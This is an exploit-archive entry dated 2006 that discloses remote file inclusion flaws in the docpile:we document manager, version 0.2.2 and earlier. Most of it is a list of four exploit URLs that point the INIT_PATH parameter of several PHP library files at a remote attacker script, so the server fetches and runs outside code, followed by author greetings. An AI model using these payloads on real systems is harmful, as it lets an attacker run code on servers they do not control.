id: 662
date: 08/07/2006
title: docpile:we <= 0.2.2 (INIT_PATH) Remote File Inclusion Vulnerabilities
author: xoron
cves: 

=====================================================================
docpile:we <= 0.2.2 (INIT_PATH) Remote File Inclusion Vulnerabilities
=====================================================================



***********************************
TiTLE: docpile:we  v0.2.2 (INIT_PATH) Remote File Inclusion Vulnerability
-

Author: xoron
-

Class : Remote
-

URL: http://docpile-we.berlios.de
-

Exploit:
http://www.site.com/[path]/lib/folder.class.php?INIT_PATH=http://evil_script?
http://www.site.com/[path]/lib/email.inc.php?INIT_PATH=http://evil_script?
http://www.site.com/[path]/lib/document.class.php?INIT_PATH=http://evil_script?
http://www.site.com/[path]/lib/auth.inc.php?INIT_PATH=http://evil_script?
-

Greetz: Preddy, Iron, x-master, DJR, R3D4C!D , sakkkure
***************************************************




#  0day.today [2023-03-23]  #